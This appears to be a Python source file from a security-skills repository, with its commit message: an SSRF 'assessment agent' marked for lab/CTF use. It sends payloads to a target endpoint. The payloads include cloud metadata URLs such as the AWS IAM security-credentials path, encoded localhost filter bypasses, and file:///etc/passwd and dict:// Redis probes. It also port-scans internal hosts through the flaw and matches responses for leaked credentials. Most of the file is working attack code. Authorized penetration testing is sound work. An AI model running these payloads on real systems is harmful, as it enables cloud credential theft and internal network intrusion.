Files
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

184 lines
7.3 KiB
Python

#!/usr/bin/env python3
# For authorized testing in lab/CTF environments only
"""SSRF vulnerability detection agent with cloud metadata and filter bypass testing."""
import argparse
import json
import logging
import sys
from typing import List
try:
import requests
except ImportError:
sys.exit("requests is required: pip install requests")
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s",
)
logger = logging.getLogger(__name__)

# Cloud instance-metadata URLs used as SSRF payloads, keyed by a short
# label that is later attached to each result as "cloud_provider".
CLOUD_METADATA = {
    "aws_imdsv1": "http://169.254.169.254/latest/meta-data/",
    "aws_iam": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "gcp": "http://metadata.google.internal/computeMetadata/v1/",
    "azure": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    "digitalocean": "http://169.254.169.254/metadata/v1/",
}

# Alternative spellings of local addresses, used to probe whether a
# URL filter on the target can be sidestepped.
LOCALHOST_BYPASSES = [
    "http://127.0.0.1/",         # plain dotted-quad loopback
    "http://0177.0.0.1/",        # first octet written in octal (0177 == 127)
    "http://0x7f.0.0.1/",        # first octet written in hex (0x7f == 127)
    "http://2130706433/",        # 127.0.0.1 as one 32-bit decimal integer
    "http://127.1/",             # shortened dotted form
    "http://0/",                 # bare zero host
    "http://[::1]/",             # IPv6 loopback literal
    "http://0.0.0.0/",           # all-zeros address
    "http://127.0.0.1.nip.io/",  # hostname that embeds 127.0.0.1
]

# Payloads that use URL schemes other than http/https.
PROTOCOL_PAYLOADS = [
    "file:///etc/passwd",
    "file:///c:/windows/win.ini",
    "dict://127.0.0.1:6379/info",
]
def test_ssrf_endpoint(target_url: str, param_name: str, payload_url: str,
                       method: str = "POST", auth_header: str = "") -> dict:
    """Submit one SSRF payload to the target and summarise the response.

    Args:
        target_url: Endpoint that receives the request.
        param_name: Name of the parameter that carries the payload URL.
        payload_url: URL the target is being asked to fetch.
        method: "POST" (case-insensitive) sends the parameter as a JSON
            body; any other value sends it as a GET query parameter.
        auth_header: Value for the Authorization header; omitted when empty.

    Returns:
        On a completed request, a dict with "payload", "status_code",
        "content_length", "response_preview" (first 200 characters of the
        body) and "success_indicators". If requests raises a
        RequestException, a dict with only "payload" and "error".
    """
    request_headers = {"Content-Type": "application/json"}
    if auth_header:
        request_headers["Authorization"] = auth_header
    injected = {param_name: payload_url}
    # Options shared by both request styles: 10 second timeout and TLS
    # certificate verification switched off.
    common = {"headers": request_headers, "timeout": 10, "verify": False}
    try:
        if method.upper() == "POST":
            response = requests.post(target_url, json=injected, **common)
        else:
            response = requests.get(target_url, params=injected, **common)
        body_text = response.text
        return {
            "payload": payload_url,
            "status_code": response.status_code,
            "content_length": len(response.content),
            "response_preview": body_text[:200],
            "success_indicators": _check_success(body_text, payload_url),
        }
    except requests.RequestException as err:
        return {"payload": payload_url, "error": str(err)}
def _check_success(response_text: str, payload: str) -> List[str]:
"""Check response for indicators of successful SSRF."""
indicators = []
checks = {
"aws_metadata": ["ami-id", "instance-id", "security-credentials", "iam"],
"gcp_metadata": ["computeMetadata", "project-id", "service-accounts"],
"azure_metadata": ["vmId", "subscriptionId", "resourceGroupName"],
"local_file": ["root:", "/bin/bash", "[extensions]", "for 16-bit"],
"internal_service": ["redis_version", "elasticsearch", "Jenkins"],
}
for name, keywords in checks.items():
if any(kw.lower() in response_text.lower() for kw in keywords):
indicators.append(name)
return indicators
def test_cloud_metadata(target_url: str, param_name: str,
                        auth_header: str = "") -> List[dict]:
    """Submit every URL in CLOUD_METADATA as an SSRF payload.

    Each result dict from test_ssrf_endpoint is tagged with a
    "cloud_provider" key holding the CLOUD_METADATA label. A warning is
    logged for every result that carries success indicators.

    Returns:
        One result dict per CLOUD_METADATA entry, in declaration order.
    """
    outcomes = []
    for provider in CLOUD_METADATA:
        outcome = test_ssrf_endpoint(target_url, param_name,
                                     CLOUD_METADATA[provider],
                                     auth_header=auth_header)
        outcome["cloud_provider"] = provider
        hits = outcome.get("success_indicators")
        if hits:
            logger.warning("SSRF to %s: indicators=%s", provider, hits)
        outcomes.append(outcome)
    return outcomes
def test_localhost_bypasses(target_url: str, param_name: str,
                            auth_header: str = "") -> List[dict]:
    """Submit every URL in LOCALHOST_BYPASSES as an SSRF payload.

    Returns:
        One result dict per bypass URL, in list order, each extended with
        "bypass_type" set to "localhost_encoding".
    """
    return [
        dict(
            test_ssrf_endpoint(target_url, param_name, candidate,
                               auth_header=auth_header),
            bypass_type="localhost_encoding",
        )
        for candidate in LOCALHOST_BYPASSES
    ]
def test_protocol_schemes(target_url: str, param_name: str,
                          auth_header: str = "") -> List[dict]:
    """Submit every entry of PROTOCOL_PAYLOADS (file:// and dict:// URLs).

    Returns:
        One result dict per payload, in list order, each extended with a
        "protocol" key holding the part of the payload before the first
        colon.
    """
    outcomes = []
    for scheme_payload in PROTOCOL_PAYLOADS:
        scheme, _, _ = scheme_payload.partition(":")
        outcome = test_ssrf_endpoint(target_url, param_name, scheme_payload,
                                     auth_header=auth_header)
        outcome["protocol"] = scheme
        outcomes.append(outcome)
    return outcomes
def scan_internal_ports(target_url: str, param_name: str, internal_ip: str,
                        ports: List[int], auth_header: str = "") -> List[dict]:
    """Probe ports on an internal host by way of the SSRF-prone endpoint.

    For each port, the payload "http://<internal_ip>:<port>/" is submitted
    through test_ssrf_endpoint.

    Returns:
        One result dict per port, in input order, each extended with
        "internal_ip", "port" and "port_likely_open". The last is True only
        when the target answered with status 200, a non-empty body and no
        request error.
    """
    probes = []
    for port in ports:
        probe = test_ssrf_endpoint(target_url, param_name,
                                   f"http://{internal_ip}:{port}/",
                                   auth_header=auth_header)
        looks_open = (
            not probe.get("error")
            and probe.get("status_code") == 200
            and probe.get("content_length", 0) > 0
        )
        probe.update(internal_ip=internal_ip, port=port,
                     port_likely_open=looks_open)
        probes.append(probe)
    return probes
def run_assessment(target_url: str, param_name: str, auth_header: str = "") -> dict:
    """Run every SSRF test group against the target and build a report.

    The groups run in this order: cloud metadata, localhost bypasses,
    non-HTTP schemes, then a port scan of 127.0.0.1 over a fixed port list.

    Returns:
        A dict holding the target, the parameter name, the raw results of
        each group and a "findings" list of summary strings.
    """
    cloud = test_cloud_metadata(target_url, param_name, auth_header)
    bypasses = test_localhost_bypasses(target_url, param_name, auth_header)
    protocols = test_protocol_schemes(target_url, param_name, auth_header)
    ports = scan_internal_ports(
        target_url, param_name, "127.0.0.1",
        [22, 80, 443, 3306, 5432, 6379, 8080, 9200], auth_header,
    )

    findings = []

    # Cloud metadata: any result that carries success indicators counts.
    cloud_hit_count = sum(1 for entry in cloud if entry.get("success_indicators"))
    if cloud_hit_count:
        findings.append(
            f"CRITICAL: Cloud metadata accessible via {cloud_hit_count} endpoints"
        )

    # Localhost bypasses: a 200 response with more than 50 bytes of body.
    bypass_hit_count = sum(
        1 for entry in bypasses
        if entry.get("status_code") == 200 and entry.get("content_length", 0) > 50
    )
    if bypass_hit_count:
        findings.append(
            f"HIGH: {bypass_hit_count} localhost filter bypass(es) successful"
        )

    # Non-HTTP schemes: list the schemes whose results show indicators.
    accepted_schemes = [
        entry["protocol"] for entry in protocols if entry.get("success_indicators")
    ]
    if accepted_schemes:
        findings.append(
            f"HIGH: Non-HTTP protocols accepted ({', '.join(accepted_schemes)})"
        )

    return {
        "target": target_url,
        "parameter": param_name,
        "cloud_metadata_tests": cloud,
        "localhost_bypasses": bypasses,
        "protocol_tests": protocols,
        "internal_port_scan": ports,
        "findings": findings,
    }
def _parse_cli_args():
    """Define the command-line options and parse them from sys.argv."""
    cli = argparse.ArgumentParser(description="SSRF Vulnerability Assessment Agent")
    cli.add_argument("--url", required=True, help="Target URL with SSRF-prone endpoint")
    cli.add_argument("--param", default="url", help="Parameter name accepting URLs")
    cli.add_argument("--auth", default="", help="Authorization header value")
    cli.add_argument("--output", default="ssrf_report.json")
    return cli.parse_args()


def main():
    """Run the assessment, save the JSON report and print it to stdout."""
    options = _parse_cli_args()
    report = run_assessment(options.url, options.param, options.auth)
    with open(options.output, "w") as report_file:
        json.dump(report, report_file, indent=2)
    logger.info("Report saved to %s", options.output)
    print(json.dumps(report, indent=2))


if __name__ == "__main__":
    main()